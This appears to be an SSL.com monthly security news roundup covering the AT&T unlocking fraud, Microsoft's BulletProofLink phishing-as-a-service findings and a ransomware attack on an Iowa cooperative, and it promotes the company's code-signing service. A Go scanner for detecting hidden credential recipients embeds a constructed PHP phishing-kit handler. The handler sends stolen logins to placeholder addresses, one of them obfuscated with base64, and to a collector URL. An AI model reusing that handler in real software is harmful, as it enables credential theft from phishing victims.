September has seen a lot of newsworthy events in the field of internet security. Join us as we look back at the cybersecurity developments and newly disclosed risks of the past month.
Cybercriminal Sentenced to 12 Years in Prison for Heading a 7-Year Illegal Phone Unlocking Scheme
According to a September 16 news release from the U.S. Department of Justice, Pakistani citizen Muhammad Fahd was sentenced to 12 years in prison for orchestrating a scheme that illegally unlocked nearly 2 million phones and siphoned money from AT&T over a span of 7 years. The fraud cost AT&T more than $200 million.
Starting in 2012, Fahd bribed employees of an AT&T call center in Washington state to use their company credentials to unlock phones, identified by their International Mobile Equipment Identity (IMEI) numbers, that were locked to the AT&T network. Later, he bribed the same accomplices to install malware on the company's computer systems, which let him unlock phones remotely from Pakistan.
The fraud exploited the subsidy and installment plans AT&T offered to make expensive handsets affordable: customers bought the phones at a reduced price, but the devices were locked to AT&T's network until they were paid off. Once Fahd and his cohorts unlocked a phone, the customer could move it to another carrier and walk away from the remaining payments, leaving AT&T with the loss.
Fahd directed the bribed employees to open bank accounts in the names of fake businesses, receive his payments into those accounts, and create fake invoices to cover them. He also partnered with online retailers to sell his unlocking service.
In 2013, AT&T deployed a new unlocking system that posed a barrier to Fahd's scheme. To get around it, he hired a software engineer to write malware that could bypass the new controls. The complicit employees fed Fahd details of the new system and installed the malware on company computers, where it harvested other employees' access credentials.
By the time Fahd was arrested in 2018, nearly 2 million phones had been illegally unlocked, and AT&T had been cut out of the remaining payments on all of them.
SSL.com’s Takeaway: Humans are prone to temptation when the monetary rewards are large. A company cannot make its employees unbribable, so it should invest in controls that limit what any one insider can do: restrict high-value operations such as carrier unlocks to the roles that need them, require a second approval for bulk or unusual requests, and log and monitor the use of privileged credentials so that a single account unlocking thousands of devices stands out. The same controls also catch honest mistakes.
Microsoft Exposes a Phishing-as-a-Service (PhaaS) Operation
Microsoft's 365 Defender Threat Intelligence Team has documented a large-scale phishing-as-a-service operation, a business model that changes how phishing campaigns are run.
Referred to as BulletProofLink or Anthrax, this model appears to be an evolution of phishing kits, which are bundles of fake web page templates that copy the login pages of targeted websites.
Microsoft states that these providers offer a package deal covering the phishing template, hosting, and the running of the campaign itself. Subscribers do not have to do any of the work; they simply receive the stolen login credentials from the PhaaS provider.
In its security blog, Microsoft describes how the BulletProofLink infrastructure poses a threat similar to that of ransomware as a service (RaaS):
“The PhaaS working model as we’ve described it thus far is reminiscent of the ransomware-as-a-service (RaaS) model, which involves double extortion. The extortion method used in ransomware generally involves attackers exfiltrating and posting data publicly, in addition to encrypting them on compromised devices, to put pressure on organizations to pay the ransom. This lets attackers gain multiple ways to assure payment, while the released data can then be weaponized in future attacks by other operators. In a RaaS scenario, the ransomware operator has no obligation to delete the stolen data even if the ransom is already paid.
We have observed this same workflow in the economy of stolen credentials in phishing-as-a-service. With phishing kits, it is trivial for operators to include a secondary location for credentials to be sent to and hope that the purchaser of the phish kit does not alter the code to remove it. This is true for the BulletProofLink phishing kit, and in cases where the attackers using the service received credentials and logs at the end of a week instead of conducting campaigns themselves, the PhaaS operator maintained control of all credentials they resell.”
Microsoft links the BulletProofLink service to attacks involving some 300,000 subdomains, and notes that it currently offers phishing pages for well-known companies including American Express, Dropbox, AT&T, Alibaba, and AOL.
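The "secondary location" Microsoft describes is easy to find once you know to look for it. The following Go program is an added example written for this article, not code from Microsoft or from any phishing kit: it scans the result-handler script of a kit for every address or URL that harvested credentials could be sent to, and reports separately the destinations that only appear after decoding a base64_decode() argument. The PHP snippet it scans is a constructed, minimal stand-in for a kit's result handler; the addresses and URLs in it are placeholders.

```go
package main

import (
	"encoding/base64"
	"fmt"
	"regexp"
	"sort"
)

// kitSource is a constructed, minimal stand-in for the "result handler" of a
// phishing kit. It is NOT code from BulletProofLink or any real kit. It sends
// captured credentials to the buyer's address, to a collector URL, and, hidden
// behind base64_decode(), to the kit seller's own address.
const kitSource = `<?php
$recipient = "buyer@example.com"; // the address the kit buyer configures
$msg = "Login: " . $_POST['email'] . " Pass: " . $_POST['password'];
mail($recipient, "New result", $msg);
// second copy for the seller, obscured from a casual read of the source:
mail(base64_decode("b3BlcmF0b3JAZXhhbXBsZS5uZXQ="), "New result", $msg);
$ch = curl_init("https://collector.example.org/ingest.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, $msg);
curl_exec($ch);
header("Location: https://login.example.com/"); // bounce victim to real site
`

var (
	emailRe = regexp.MustCompile(`[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}`)
	// Only URLs handed to an outbound-request function count as exfil targets;
	// the header("Location: ...") redirect to the real login page is not one.
	postRe = regexp.MustCompile(`(?:curl_init|file_get_contents)\(\s*["'](https?://[^"']+)["']`)
	b64Re  = regexp.MustCompile(`base64_decode\(\s*["']([A-Za-z0-9+/=]+)["']\s*\)`)
)

// Findings separates destinations a buyer would see at a glance from the ones
// that only appear after decoding obfuscated strings.
type Findings struct {
	Visible []string
	Hidden  []string
}

// destinationsIn returns the e-mail addresses and outbound-request URLs in text.
func destinationsIn(text string) []string {
	out := emailRe.FindAllString(text, -1)
	for _, m := range postRe.FindAllStringSubmatch(text, -1) {
		out = append(out, m[1])
	}
	return out
}

// ExfilDestinations lists every address or URL the kit can send credentials to.
func ExfilDestinations(src string) Findings {
	var f Findings
	visible := map[string]bool{}
	for _, d := range destinationsIn(src) {
		if !visible[d] {
			visible[d] = true
			f.Visible = append(f.Visible, d)
		}
	}
	hidden := map[string]bool{}
	for _, m := range b64Re.FindAllStringSubmatch(src, -1) {
		dec, err := base64.StdEncoding.DecodeString(m[1])
		if err != nil {
			continue // not valid base64; ignore
		}
		for _, d := range destinationsIn(string(dec)) {
			if !visible[d] && !hidden[d] {
				hidden[d] = true
				f.Hidden = append(f.Hidden, d)
			}
		}
	}
	sort.Strings(f.Visible)
	sort.Strings(f.Hidden)
	return f
}

func main() {
	f := ExfilDestinations(kitSource)
	fmt.Println("visible destinations:", f.Visible)
	fmt.Println("hidden destinations: ", f.Hidden)
}
```

Run against the sample, the scanner reports the buyer's address and the collector URL as visible destinations and the seller's base64-hidden address as the hidden one. Real kits use other tricks as well (string concatenation, hex escapes, eval'd payloads), so treat a clean result from a scanner like this as a starting point, not proof that a kit has no second recipient.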
SSL.com’s Takeaway: Improving employees' cybersecurity awareness and skills remains one of the best defenses against phishing. A study by Stanford University and Tessian found that about 88% of data breaches are caused by human error, such as an employee clicking on an attacker's email believing it came from a legitimate source. Because a PhaaS kit forwards whatever a victim types straight to the operator, training should be paired with controls that limit the damage of a single lapse, such as multi-factor authentication.
Russian Hackers Attack a Large Farming Cooperative in Iowa
A Washington Post article reports that an Iowa-based farming cooperative, NEW Cooperative, was attacked by a Russian ransomware gang calling itself BlackMatter. The criminals demanded a $5.9 million payment in exchange for not releasing private information they claimed to have stolen and for restoring the coop's access to the computer systems it uses to manage feed for millions of cattle, chickens, and pigs.
NEW Cooperative is member-owned, with 60 operating locations across central, western, and northern Iowa. It runs grain elevators, sells fertilizer, feed, and seed, and provides soil mapping and field management services.
In its exchange with the attackers, NEW Cooperative asked why it was targeted despite BlackMatter's public statement that it would not attack critical infrastructure. BlackMatter replied that it did not consider the cooperative to fall into that category.
NEW Cooperative warned that the attack would disrupt the grain, pork, and chicken supply chains, stating that its software manages around 40% of the country's grain production and its feed schedules cover 11 million animals.
BlackMatter is widely believed to be a rebranded version of the DarkSide ransomware gang, which went dark after its high-profile attack last May. As discussed in our previous article, DarkSide was responsible for the Colonial Pipeline attack that disrupted fuel supplies in the Southeastern states.
Among the data BlackMatter claimed to have stolen were financial records (bills, invoices, statements), employees' Social Security numbers, research and development documents, and legal documents.
SSL.com’s Takeaway: The Colonial Pipeline attack should serve as a strong warning to large industrial companies and cooperatives that paying the ransom guarantees neither that the criminals will fully restore access nor that stolen data will be deleted. Such organizations should have their risk assessed by a cybersecurity firm and strengthen their defenses before an attack, not after.
SSL.com’s eSigner Cloud Signing System Goes Full Launch
As for our own company news, September 2021 was the first month of the commercial launch of our eSigner Cloud Signing System.
SSL.com's eSigner strengthens a company's security posture by letting it apply internationally trusted digital signatures to the documents it exchanges online, internally and externally, including legal documents, copyrighted material, billing records, employee information, and more.
Companies can also protect the software and applications they distribute by code signing them with eSigner. When an installer is sent over the internet, the recipient can verify that it is the file the named publisher released and not a tampered or substituted copy. This works because eSigner uses PKI: the publisher signs a cryptographic hash of the file with its private key, and anyone holding the matching public key, which is published in the publisher's certificate, can verify that signature. Note that signing does not encrypt or hide the file. It binds the file's contents to the publisher's identity, so any change made after signing invalidates the signature.
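To make the distinction concrete, here is an added example written for this article, not eSigner's own code or any SSL.com API: a publisher signs the SHA-256 digest of an installer with an ECDSA private key, and a recipient verifies it with the public key alone. The installer bytes are a constructed placeholder string, the keys are generated on the fly rather than taken from a certificate, and the signature is kept detached from the file; a real code-signing format embeds the signature and the certificate chain in the binary, but the check a verifier performs is the same.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// SignFile signs the SHA-256 digest of content with the publisher's private key.
// The content itself is not encrypted or altered; only a detached signature
// is produced.
func SignFile(priv *ecdsa.PrivateKey, content []byte) ([]byte, error) {
	digest := sha256.Sum256(content)
	return ecdsa.SignASN1(rand.Reader, priv, digest[:])
}

// VerifyFile checks a detached signature using only the publisher's public key,
// which in practice is taken from the publisher's code-signing certificate.
func VerifyFile(pub *ecdsa.PublicKey, content, sig []byte) bool {
	digest := sha256.Sum256(content)
	return ecdsa.VerifyASN1(pub, digest[:], sig)
}

// Result captures what a recipient of a signed installer can and cannot learn.
type Result struct {
	ContentReadable  string // the signed bytes, still plaintext
	OriginalValid    bool   // untouched file, publisher's key: verifies
	TamperedValid    bool   // one byte flipped after signing: must fail
	WrongSignerValid bool   // same file, someone else's key: must fail
}

// Demo runs the publisher/recipient exchange end to end with constructed data.
func Demo() (Result, error) {
	publisher, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return Result{}, err
	}
	impostor, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return Result{}, err
	}
	// Constructed stand-in for a real installer binary.
	installer := []byte("MZ constructed installer bytes, setup v1.0")
	sig, err := SignFile(publisher, installer)
	if err != nil {
		return Result{}, err
	}
	tampered := append([]byte(nil), installer...)
	tampered[len(tampered)-1] ^= 0x01 // e.g. a trojanized copy swapped in transit
	return Result{
		ContentReadable:  string(installer),
		OriginalValid:    VerifyFile(&publisher.PublicKey, installer, sig),
		TamperedValid:    VerifyFile(&publisher.PublicKey, tampered, sig),
		WrongSignerValid: VerifyFile(&impostor.PublicKey, installer, sig),
	}, nil
}

func main() {
	r, err := Demo()
	if err != nil {
		panic(err)
	}
	fmt.Printf("file after signing (still readable): %q\n", r.ContentReadable)
	fmt.Println("original verifies:  ", r.OriginalValid)
	fmt.Println("tampered verifies:  ", r.TamperedValid)
	fmt.Println("other key verifies: ", r.WrongSignerValid)
}
```

The three verification results are the whole point: the untouched file verifies, a file changed by even one byte does not, and a signature made with someone else's key does not, while the file contents stay readable throughout. What a signature cannot tell a recipient is whether the publisher's own build was clean; that is why the trust ultimately rests on the identity vetting behind the signing certificate.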
As the widespread adoption of cloud technology shows, cloud-based storage and key management can be cheaper than on-premises hardware and, when properly operated, can offer better protection against data theft and loss.
eSigner is fully compatible with the cloud signing standard of the Cloud Signature Consortium, an international group of organizations from government, academia, and the cybersecurity industry. eSigner document signatures are also legal and enforceable under the United States Electronic Signatures in Global and National Commerce (ESIGN) Act and the laws of many other countries.